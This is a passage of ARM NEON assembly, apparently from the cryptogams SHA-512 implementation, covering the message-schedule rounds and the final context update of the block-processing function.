vsli.64 d25,d18,#46
vmov d29,d18
vsli.64 d26,d18,#23
#if 10<16 && defined(__ARMEL__)
vrev64.8 d10,d10
#endif
veor d25,d24
vbsl d29,d19,d20 @ Ch(e,f,g)
vshr.u64 d24,d22,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d21
vshr.u64 d25,d22,#34
vsli.64 d24,d22,#36
vadd.i64 d27,d26
vshr.u64 d26,d22,#39
vadd.i64 d28,d10
vsli.64 d25,d22,#30
veor d30,d22,d23
vsli.64 d26,d22,#25
veor d21,d24,d25
vadd.i64 d27,d28
vbsl d30,d16,d23 @ Maj(a,b,c)
veor d21,d26 @ Sigma0(a)
vadd.i64 d17,d27
vadd.i64 d30,d27
@ vadd.i64 d21,d30
vshr.u64 d24,d17,#14 @ 11
#if 11<16
vld1.64 {d11},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d17,#18
#if 11>0
vadd.i64 d21,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d17,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d17,#50
vsli.64 d25,d17,#46
vmov d29,d17
vsli.64 d26,d17,#23
#if 11<16 && defined(__ARMEL__)
vrev64.8 d11,d11
#endif
veor d25,d24
vbsl d29,d18,d19 @ Ch(e,f,g)
vshr.u64 d24,d21,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d20
vshr.u64 d25,d21,#34
vsli.64 d24,d21,#36
vadd.i64 d27,d26
vshr.u64 d26,d21,#39
vadd.i64 d28,d11
vsli.64 d25,d21,#30
veor d30,d21,d22
vsli.64 d26,d21,#25
veor d20,d24,d25
vadd.i64 d27,d28
vbsl d30,d23,d22 @ Maj(a,b,c)
veor d20,d26 @ Sigma0(a)
vadd.i64 d16,d27
vadd.i64 d30,d27
@ vadd.i64 d20,d30
vshr.u64 d24,d16,#14 @ 12
#if 12<16
vld1.64 {d12},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d16,#18
#if 12>0
vadd.i64 d20,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d16,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d16,#50
vsli.64 d25,d16,#46
vmov d29,d16
vsli.64 d26,d16,#23
#if 12<16 && defined(__ARMEL__)
vrev64.8 d12,d12
#endif
veor d25,d24
vbsl d29,d17,d18 @ Ch(e,f,g)
vshr.u64 d24,d20,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d19
vshr.u64 d25,d20,#34
vsli.64 d24,d20,#36
vadd.i64 d27,d26
vshr.u64 d26,d20,#39
vadd.i64 d28,d12
vsli.64 d25,d20,#30
veor d30,d20,d21
vsli.64 d26,d20,#25
veor d19,d24,d25
vadd.i64 d27,d28
vbsl d30,d22,d21 @ Maj(a,b,c)
veor d19,d26 @ Sigma0(a)
vadd.i64 d23,d27
vadd.i64 d30,d27
@ vadd.i64 d19,d30
vshr.u64 d24,d23,#14 @ 13
#if 13<16
vld1.64 {d13},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d23,#18
#if 13>0
vadd.i64 d19,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d23,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d23,#50
vsli.64 d25,d23,#46
vmov d29,d23
vsli.64 d26,d23,#23
#if 13<16 && defined(__ARMEL__)
vrev64.8 d13,d13
#endif
veor d25,d24
vbsl d29,d16,d17 @ Ch(e,f,g)
vshr.u64 d24,d19,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d18
vshr.u64 d25,d19,#34
vsli.64 d24,d19,#36
vadd.i64 d27,d26
vshr.u64 d26,d19,#39
vadd.i64 d28,d13
vsli.64 d25,d19,#30
veor d30,d19,d20
vsli.64 d26,d19,#25
veor d18,d24,d25
vadd.i64 d27,d28
vbsl d30,d21,d20 @ Maj(a,b,c)
veor d18,d26 @ Sigma0(a)
vadd.i64 d22,d27
vadd.i64 d30,d27
@ vadd.i64 d18,d30
vshr.u64 d24,d22,#14 @ 14
#if 14<16
vld1.64 {d14},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d22,#18
#if 14>0
vadd.i64 d18,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d22,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d22,#50
vsli.64 d25,d22,#46
vmov d29,d22
vsli.64 d26,d22,#23
#if 14<16 && defined(__ARMEL__)
vrev64.8 d14,d14
#endif
veor d25,d24
vbsl d29,d23,d16 @ Ch(e,f,g)
vshr.u64 d24,d18,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d17
vshr.u64 d25,d18,#34
vsli.64 d24,d18,#36
vadd.i64 d27,d26
vshr.u64 d26,d18,#39
vadd.i64 d28,d14
vsli.64 d25,d18,#30
veor d30,d18,d19
vsli.64 d26,d18,#25
veor d17,d24,d25
vadd.i64 d27,d28
vbsl d30,d20,d19 @ Maj(a,b,c)
veor d17,d26 @ Sigma0(a)
vadd.i64 d21,d27
vadd.i64 d30,d27
@ vadd.i64 d17,d30
vshr.u64 d24,d21,#14 @ 15
#if 15<16
vld1.64 {d15},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d21,#18
#if 15>0
vadd.i64 d17,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d21,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d21,#50
vsli.64 d25,d21,#46
vmov d29,d21
vsli.64 d26,d21,#23
#if 15<16 && defined(__ARMEL__)
vrev64.8 d15,d15
#endif
veor d25,d24
vbsl d29,d22,d23 @ Ch(e,f,g)
vshr.u64 d24,d17,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d16
vshr.u64 d25,d17,#34
vsli.64 d24,d17,#36
vadd.i64 d27,d26
vshr.u64 d26,d17,#39
vadd.i64 d28,d15
vsli.64 d25,d17,#30
veor d30,d17,d18
vsli.64 d26,d17,#25
veor d16,d24,d25
vadd.i64 d27,d28
vbsl d30,d19,d18 @ Maj(a,b,c)
veor d16,d26 @ Sigma0(a)
vadd.i64 d20,d27
vadd.i64 d30,d27
@ vadd.i64 d16,d30
mov r12,#4
.L16_79_neon:
subs r12,#1
vshr.u64 q12,q7,#19
vshr.u64 q13,q7,#61
vadd.i64 d16,d30 @ h+=Maj from the past
vshr.u64 q15,q7,#6
vsli.64 q12,q7,#45
vext.8 q14,q0,q1,#8 @ X[i+1]
vsli.64 q13,q7,#3
veor q15,q12
vshr.u64 q12,q14,#1
veor q15,q13 @ sigma1(X[i+14])
vshr.u64 q13,q14,#8
vadd.i64 q0,q15
vshr.u64 q15,q14,#7
vsli.64 q12,q14,#63
vsli.64 q13,q14,#56
vext.8 q14,q4,q5,#8 @ X[i+9]
veor q15,q12
vshr.u64 d24,d20,#14 @ from NEON_00_15
vadd.i64 q0,q14
vshr.u64 d25,d20,#18 @ from NEON_00_15
veor q15,q13 @ sigma0(X[i+1])
vshr.u64 d26,d20,#41 @ from NEON_00_15
vadd.i64 q0,q15
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d20,#50
vsli.64 d25,d20,#46
vmov d29,d20
vsli.64 d26,d20,#23
#if 16<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d21,d22 @ Ch(e,f,g)
vshr.u64 d24,d16,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d23
vshr.u64 d25,d16,#34
vsli.64 d24,d16,#36
vadd.i64 d27,d26
vshr.u64 d26,d16,#39
vadd.i64 d28,d0
vsli.64 d25,d16,#30
veor d30,d16,d17
vsli.64 d26,d16,#25
veor d23,d24,d25
vadd.i64 d27,d28
vbsl d30,d18,d17 @ Maj(a,b,c)
veor d23,d26 @ Sigma0(a)
vadd.i64 d19,d27
vadd.i64 d30,d27
@ vadd.i64 d23,d30
vshr.u64 d24,d19,#14 @ 17
#if 17<16
vld1.64 {d1},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d19,#18
#if 17>0
vadd.i64 d23,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d19,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d19,#50
vsli.64 d25,d19,#46
vmov d29,d19
vsli.64 d26,d19,#23
#if 17<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d20,d21 @ Ch(e,f,g)
vshr.u64 d24,d23,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d22
vshr.u64 d25,d23,#34
vsli.64 d24,d23,#36
vadd.i64 d27,d26
vshr.u64 d26,d23,#39
vadd.i64 d28,d1
vsli.64 d25,d23,#30
veor d30,d23,d16
vsli.64 d26,d23,#25
veor d22,d24,d25
vadd.i64 d27,d28
vbsl d30,d17,d16 @ Maj(a,b,c)
veor d22,d26 @ Sigma0(a)
vadd.i64 d18,d27
vadd.i64 d30,d27
@ vadd.i64 d22,d30
vshr.u64 q12,q0,#19
vshr.u64 q13,q0,#61
vadd.i64 d22,d30 @ h+=Maj from the past
vshr.u64 q15,q0,#6
vsli.64 q12,q0,#45
vext.8 q14,q1,q2,#8 @ X[i+1]
vsli.64 q13,q0,#3
veor q15,q12
vshr.u64 q12,q14,#1
veor q15,q13 @ sigma1(X[i+14])
vshr.u64 q13,q14,#8
vadd.i64 q1,q15
vshr.u64 q15,q14,#7
vsli.64 q12,q14,#63
vsli.64 q13,q14,#56
vext.8 q14,q5,q6,#8 @ X[i+9]
veor q15,q12
vshr.u64 d24,d18,#14 @ from NEON_00_15
vadd.i64 q1,q14
vshr.u64 d25,d18,#18 @ from NEON_00_15
veor q15,q13 @ sigma0(X[i+1])
vshr.u64 d26,d18,#41 @ from NEON_00_15
vadd.i64 q1,q15
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d18,#50
vsli.64 d25,d18,#46
vmov d29,d18
vsli.64 d26,d18,#23
#if 18<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d19,d20 @ Ch(e,f,g)
vshr.u64 d24,d22,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d21
vshr.u64 d25,d22,#34
vsli.64 d24,d22,#36
vadd.i64 d27,d26
vshr.u64 d26,d22,#39
vadd.i64 d28,d2
vsli.64 d25,d22,#30
veor d30,d22,d23
vsli.64 d26,d22,#25
veor d21,d24,d25
vadd.i64 d27,d28
vbsl d30,d16,d23 @ Maj(a,b,c)
veor d21,d26 @ Sigma0(a)
vadd.i64 d17,d27
vadd.i64 d30,d27
@ vadd.i64 d21,d30
vshr.u64 d24,d17,#14 @ 19
#if 19<16
vld1.64 {d3},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d17,#18
#if 19>0
vadd.i64 d21,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d17,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d17,#50
vsli.64 d25,d17,#46
vmov d29,d17
vsli.64 d26,d17,#23
#if 19<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d18,d19 @ Ch(e,f,g)
vshr.u64 d24,d21,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d20
vshr.u64 d25,d21,#34
vsli.64 d24,d21,#36
vadd.i64 d27,d26
vshr.u64 d26,d21,#39
vadd.i64 d28,d3
vsli.64 d25,d21,#30
veor d30,d21,d22
vsli.64 d26,d21,#25
veor d20,d24,d25
vadd.i64 d27,d28
vbsl d30,d23,d22 @ Maj(a,b,c)
veor d20,d26 @ Sigma0(a)
vadd.i64 d16,d27
vadd.i64 d30,d27
@ vadd.i64 d20,d30
vshr.u64 q12,q1,#19
vshr.u64 q13,q1,#61
vadd.i64 d20,d30 @ h+=Maj from the past
vshr.u64 q15,q1,#6
vsli.64 q12,q1,#45
vext.8 q14,q2,q3,#8 @ X[i+1]
vsli.64 q13,q1,#3
veor q15,q12
vshr.u64 q12,q14,#1
veor q15,q13 @ sigma1(X[i+14])
vshr.u64 q13,q14,#8
vadd.i64 q2,q15
vshr.u64 q15,q14,#7
vsli.64 q12,q14,#63
vsli.64 q13,q14,#56
vext.8 q14,q6,q7,#8 @ X[i+9]
veor q15,q12
vshr.u64 d24,d16,#14 @ from NEON_00_15
vadd.i64 q2,q14
vshr.u64 d25,d16,#18 @ from NEON_00_15
veor q15,q13 @ sigma0(X[i+1])
vshr.u64 d26,d16,#41 @ from NEON_00_15
vadd.i64 q2,q15
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d16,#50
vsli.64 d25,d16,#46
vmov d29,d16
vsli.64 d26,d16,#23
#if 20<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d17,d18 @ Ch(e,f,g)
vshr.u64 d24,d20,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d19
vshr.u64 d25,d20,#34
vsli.64 d24,d20,#36
vadd.i64 d27,d26
vshr.u64 d26,d20,#39
vadd.i64 d28,d4
vsli.64 d25,d20,#30
veor d30,d20,d21
vsli.64 d26,d20,#25
veor d19,d24,d25
vadd.i64 d27,d28
vbsl d30,d22,d21 @ Maj(a,b,c)
veor d19,d26 @ Sigma0(a)
vadd.i64 d23,d27
vadd.i64 d30,d27
@ vadd.i64 d19,d30
vshr.u64 d24,d23,#14 @ 21
#if 21<16
vld1.64 {d5},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d23,#18
#if 21>0
vadd.i64 d19,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d23,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d23,#50
vsli.64 d25,d23,#46
vmov d29,d23
vsli.64 d26,d23,#23
#if 21<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d16,d17 @ Ch(e,f,g)
vshr.u64 d24,d19,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d18
vshr.u64 d25,d19,#34
vsli.64 d24,d19,#36
vadd.i64 d27,d26
vshr.u64 d26,d19,#39
vadd.i64 d28,d5
vsli.64 d25,d19,#30
veor d30,d19,d20
vsli.64 d26,d19,#25
veor d18,d24,d25
vadd.i64 d27,d28
vbsl d30,d21,d20 @ Maj(a,b,c)
veor d18,d26 @ Sigma0(a)
vadd.i64 d22,d27
vadd.i64 d30,d27
@ vadd.i64 d18,d30
vshr.u64 q12,q2,#19
vshr.u64 q13,q2,#61
vadd.i64 d18,d30 @ h+=Maj from the past
vshr.u64 q15,q2,#6
vsli.64 q12,q2,#45
vext.8 q14,q3,q4,#8 @ X[i+1]
vsli.64 q13,q2,#3
veor q15,q12
vshr.u64 q12,q14,#1
veor q15,q13 @ sigma1(X[i+14])
vshr.u64 q13,q14,#8
vadd.i64 q3,q15
vshr.u64 q15,q14,#7
vsli.64 q12,q14,#63
vsli.64 q13,q14,#56
vext.8 q14,q7,q0,#8 @ X[i+9]
veor q15,q12
vshr.u64 d24,d22,#14 @ from NEON_00_15
vadd.i64 q3,q14
vshr.u64 d25,d22,#18 @ from NEON_00_15
veor q15,q13 @ sigma0(X[i+1])
vshr.u64 d26,d22,#41 @ from NEON_00_15
vadd.i64 q3,q15
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d22,#50
vsli.64 d25,d22,#46
vmov d29,d22
vsli.64 d26,d22,#23
#if 22<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d23,d16 @ Ch(e,f,g)
vshr.u64 d24,d18,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d17
vshr.u64 d25,d18,#34
vsli.64 d24,d18,#36
vadd.i64 d27,d26
vshr.u64 d26,d18,#39
vadd.i64 d28,d6
vsli.64 d25,d18,#30
veor d30,d18,d19
vsli.64 d26,d18,#25
veor d17,d24,d25
vadd.i64 d27,d28
vbsl d30,d20,d19 @ Maj(a,b,c)
veor d17,d26 @ Sigma0(a)
vadd.i64 d21,d27
vadd.i64 d30,d27
@ vadd.i64 d17,d30
vshr.u64 d24,d21,#14 @ 23
#if 23<16
vld1.64 {d7},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d21,#18
#if 23>0
vadd.i64 d17,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d21,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d21,#50
vsli.64 d25,d21,#46
vmov d29,d21
vsli.64 d26,d21,#23
#if 23<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d22,d23 @ Ch(e,f,g)
vshr.u64 d24,d17,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d16
vshr.u64 d25,d17,#34
vsli.64 d24,d17,#36
vadd.i64 d27,d26
vshr.u64 d26,d17,#39
vadd.i64 d28,d7
vsli.64 d25,d17,#30
veor d30,d17,d18
vsli.64 d26,d17,#25
veor d16,d24,d25
vadd.i64 d27,d28
vbsl d30,d19,d18 @ Maj(a,b,c)
veor d16,d26 @ Sigma0(a)
vadd.i64 d20,d27
vadd.i64 d30,d27
@ vadd.i64 d16,d30
vshr.u64 q12,q3,#19
vshr.u64 q13,q3,#61
vadd.i64 d16,d30 @ h+=Maj from the past
vshr.u64 q15,q3,#6
vsli.64 q12,q3,#45
vext.8 q14,q4,q5,#8 @ X[i+1]
vsli.64 q13,q3,#3
veor q15,q12
vshr.u64 q12,q14,#1
veor q15,q13 @ sigma1(X[i+14])
vshr.u64 q13,q14,#8
vadd.i64 q4,q15
vshr.u64 q15,q14,#7
vsli.64 q12,q14,#63
vsli.64 q13,q14,#56
vext.8 q14,q0,q1,#8 @ X[i+9]
veor q15,q12
vshr.u64 d24,d20,#14 @ from NEON_00_15
vadd.i64 q4,q14
vshr.u64 d25,d20,#18 @ from NEON_00_15
veor q15,q13 @ sigma0(X[i+1])
vshr.u64 d26,d20,#41 @ from NEON_00_15
vadd.i64 q4,q15
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d20,#50
vsli.64 d25,d20,#46
vmov d29,d20
vsli.64 d26,d20,#23
#if 24<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d21,d22 @ Ch(e,f,g)
vshr.u64 d24,d16,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d23
vshr.u64 d25,d16,#34
vsli.64 d24,d16,#36
vadd.i64 d27,d26
vshr.u64 d26,d16,#39
vadd.i64 d28,d8
vsli.64 d25,d16,#30
veor d30,d16,d17
vsli.64 d26,d16,#25
veor d23,d24,d25
vadd.i64 d27,d28
vbsl d30,d18,d17 @ Maj(a,b,c)
veor d23,d26 @ Sigma0(a)
vadd.i64 d19,d27
vadd.i64 d30,d27
@ vadd.i64 d23,d30
vshr.u64 d24,d19,#14 @ 25
#if 25<16
vld1.64 {d9},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d19,#18
#if 25>0
vadd.i64 d23,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d19,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d19,#50
vsli.64 d25,d19,#46
vmov d29,d19
vsli.64 d26,d19,#23
#if 25<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d20,d21 @ Ch(e,f,g)
vshr.u64 d24,d23,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d22
vshr.u64 d25,d23,#34
vsli.64 d24,d23,#36
vadd.i64 d27,d26
vshr.u64 d26,d23,#39
vadd.i64 d28,d9
vsli.64 d25,d23,#30
veor d30,d23,d16
vsli.64 d26,d23,#25
veor d22,d24,d25
vadd.i64 d27,d28
vbsl d30,d17,d16 @ Maj(a,b,c)
veor d22,d26 @ Sigma0(a)
vadd.i64 d18,d27
vadd.i64 d30,d27
@ vadd.i64 d22,d30
vshr.u64 q12,q4,#19
vshr.u64 q13,q4,#61
vadd.i64 d22,d30 @ h+=Maj from the past
vshr.u64 q15,q4,#6
vsli.64 q12,q4,#45
vext.8 q14,q5,q6,#8 @ X[i+1]
vsli.64 q13,q4,#3
veor q15,q12
vshr.u64 q12,q14,#1
veor q15,q13 @ sigma1(X[i+14])
vshr.u64 q13,q14,#8
vadd.i64 q5,q15
vshr.u64 q15,q14,#7
vsli.64 q12,q14,#63
vsli.64 q13,q14,#56
vext.8 q14,q1,q2,#8 @ X[i+9]
veor q15,q12
vshr.u64 d24,d18,#14 @ from NEON_00_15
vadd.i64 q5,q14
vshr.u64 d25,d18,#18 @ from NEON_00_15
veor q15,q13 @ sigma0(X[i+1])
vshr.u64 d26,d18,#41 @ from NEON_00_15
vadd.i64 q5,q15
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d18,#50
vsli.64 d25,d18,#46
vmov d29,d18
vsli.64 d26,d18,#23
#if 26<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d19,d20 @ Ch(e,f,g)
vshr.u64 d24,d22,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d21
vshr.u64 d25,d22,#34
vsli.64 d24,d22,#36
vadd.i64 d27,d26
vshr.u64 d26,d22,#39
vadd.i64 d28,d10
vsli.64 d25,d22,#30
veor d30,d22,d23
vsli.64 d26,d22,#25
veor d21,d24,d25
vadd.i64 d27,d28
vbsl d30,d16,d23 @ Maj(a,b,c)
veor d21,d26 @ Sigma0(a)
vadd.i64 d17,d27
vadd.i64 d30,d27
@ vadd.i64 d21,d30
vshr.u64 d24,d17,#14 @ 27
#if 27<16
vld1.64 {d11},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d17,#18
#if 27>0
vadd.i64 d21,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d17,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d17,#50
vsli.64 d25,d17,#46
vmov d29,d17
vsli.64 d26,d17,#23
#if 27<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d18,d19 @ Ch(e,f,g)
vshr.u64 d24,d21,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d20
vshr.u64 d25,d21,#34
vsli.64 d24,d21,#36
vadd.i64 d27,d26
vshr.u64 d26,d21,#39
vadd.i64 d28,d11
vsli.64 d25,d21,#30
veor d30,d21,d22
vsli.64 d26,d21,#25
veor d20,d24,d25
vadd.i64 d27,d28
vbsl d30,d23,d22 @ Maj(a,b,c)
veor d20,d26 @ Sigma0(a)
vadd.i64 d16,d27
vadd.i64 d30,d27
@ vadd.i64 d20,d30
vshr.u64 q12,q5,#19
vshr.u64 q13,q5,#61
vadd.i64 d20,d30 @ h+=Maj from the past
vshr.u64 q15,q5,#6
vsli.64 q12,q5,#45
vext.8 q14,q6,q7,#8 @ X[i+1]
vsli.64 q13,q5,#3
veor q15,q12
vshr.u64 q12,q14,#1
veor q15,q13 @ sigma1(X[i+14])
vshr.u64 q13,q14,#8
vadd.i64 q6,q15
vshr.u64 q15,q14,#7
vsli.64 q12,q14,#63
vsli.64 q13,q14,#56
vext.8 q14,q2,q3,#8 @ X[i+9]
veor q15,q12
vshr.u64 d24,d16,#14 @ from NEON_00_15
vadd.i64 q6,q14
vshr.u64 d25,d16,#18 @ from NEON_00_15
veor q15,q13 @ sigma0(X[i+1])
vshr.u64 d26,d16,#41 @ from NEON_00_15
vadd.i64 q6,q15
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d16,#50
vsli.64 d25,d16,#46
vmov d29,d16
vsli.64 d26,d16,#23
#if 28<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d17,d18 @ Ch(e,f,g)
vshr.u64 d24,d20,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d19
vshr.u64 d25,d20,#34
vsli.64 d24,d20,#36
vadd.i64 d27,d26
vshr.u64 d26,d20,#39
vadd.i64 d28,d12
vsli.64 d25,d20,#30
veor d30,d20,d21
vsli.64 d26,d20,#25
veor d19,d24,d25
vadd.i64 d27,d28
vbsl d30,d22,d21 @ Maj(a,b,c)
veor d19,d26 @ Sigma0(a)
vadd.i64 d23,d27
vadd.i64 d30,d27
@ vadd.i64 d19,d30
vshr.u64 d24,d23,#14 @ 29
#if 29<16
vld1.64 {d13},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d23,#18
#if 29>0
vadd.i64 d19,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d23,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d23,#50
vsli.64 d25,d23,#46
vmov d29,d23
vsli.64 d26,d23,#23
#if 29<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d16,d17 @ Ch(e,f,g)
vshr.u64 d24,d19,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d18
vshr.u64 d25,d19,#34
vsli.64 d24,d19,#36
vadd.i64 d27,d26
vshr.u64 d26,d19,#39
vadd.i64 d28,d13
vsli.64 d25,d19,#30
veor d30,d19,d20
vsli.64 d26,d19,#25
veor d18,d24,d25
vadd.i64 d27,d28
vbsl d30,d21,d20 @ Maj(a,b,c)
veor d18,d26 @ Sigma0(a)
vadd.i64 d22,d27
vadd.i64 d30,d27
@ vadd.i64 d18,d30
vshr.u64 q12,q6,#19
vshr.u64 q13,q6,#61
vadd.i64 d18,d30 @ h+=Maj from the past
vshr.u64 q15,q6,#6
vsli.64 q12,q6,#45
vext.8 q14,q7,q0,#8 @ X[i+1]
vsli.64 q13,q6,#3
veor q15,q12
vshr.u64 q12,q14,#1
veor q15,q13 @ sigma1(X[i+14])
vshr.u64 q13,q14,#8
vadd.i64 q7,q15
vshr.u64 q15,q14,#7
vsli.64 q12,q14,#63
vsli.64 q13,q14,#56
vext.8 q14,q3,q4,#8 @ X[i+9]
veor q15,q12
vshr.u64 d24,d22,#14 @ from NEON_00_15
vadd.i64 q7,q14
vshr.u64 d25,d22,#18 @ from NEON_00_15
veor q15,q13 @ sigma0(X[i+1])
vshr.u64 d26,d22,#41 @ from NEON_00_15
vadd.i64 q7,q15
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d22,#50
vsli.64 d25,d22,#46
vmov d29,d22
vsli.64 d26,d22,#23
#if 30<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d23,d16 @ Ch(e,f,g)
vshr.u64 d24,d18,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d17
vshr.u64 d25,d18,#34
vsli.64 d24,d18,#36
vadd.i64 d27,d26
vshr.u64 d26,d18,#39
vadd.i64 d28,d14
vsli.64 d25,d18,#30
veor d30,d18,d19
vsli.64 d26,d18,#25
veor d17,d24,d25
vadd.i64 d27,d28
vbsl d30,d20,d19 @ Maj(a,b,c)
veor d17,d26 @ Sigma0(a)
vadd.i64 d21,d27
vadd.i64 d30,d27
@ vadd.i64 d17,d30
vshr.u64 d24,d21,#14 @ 31
#if 31<16
vld1.64 {d15},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d21,#18
#if 31>0
vadd.i64 d17,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d21,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d21,#50
vsli.64 d25,d21,#46
vmov d29,d21
vsli.64 d26,d21,#23
#if 31<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d22,d23 @ Ch(e,f,g)
vshr.u64 d24,d17,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d16
vshr.u64 d25,d17,#34
vsli.64 d24,d17,#36
vadd.i64 d27,d26
vshr.u64 d26,d17,#39
vadd.i64 d28,d15
vsli.64 d25,d17,#30
veor d30,d17,d18
vsli.64 d26,d17,#25
veor d16,d24,d25
vadd.i64 d27,d28
vbsl d30,d19,d18 @ Maj(a,b,c)
veor d16,d26 @ Sigma0(a)
vadd.i64 d20,d27
vadd.i64 d30,d27
@ vadd.i64 d16,d30
bne .L16_79_neon
vadd.i64 d16,d30 @ h+=Maj from the past
vldmia r0,{d24,d25,d26,d27,d28,d29,d30,d31} @ load context to temp
vadd.i64 q8,q12 @ vectorized accumulate
vadd.i64 q9,q13
vadd.i64 q10,q14
vadd.i64 q11,q15
vstmia r0,{d16,d17,d18,d19,d20,d21,d22,d23} @ save context
teq r1,r2
sub r3,#640 @ rewind K512
bne .Loop_neon
vldmia sp!,{d8-d15}
bx lr @ .word 0xe12fff1e
.size cryptogams_sha512_block_data_order_neon,.-cryptogams_sha512_block_data_order_neon
#endif
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.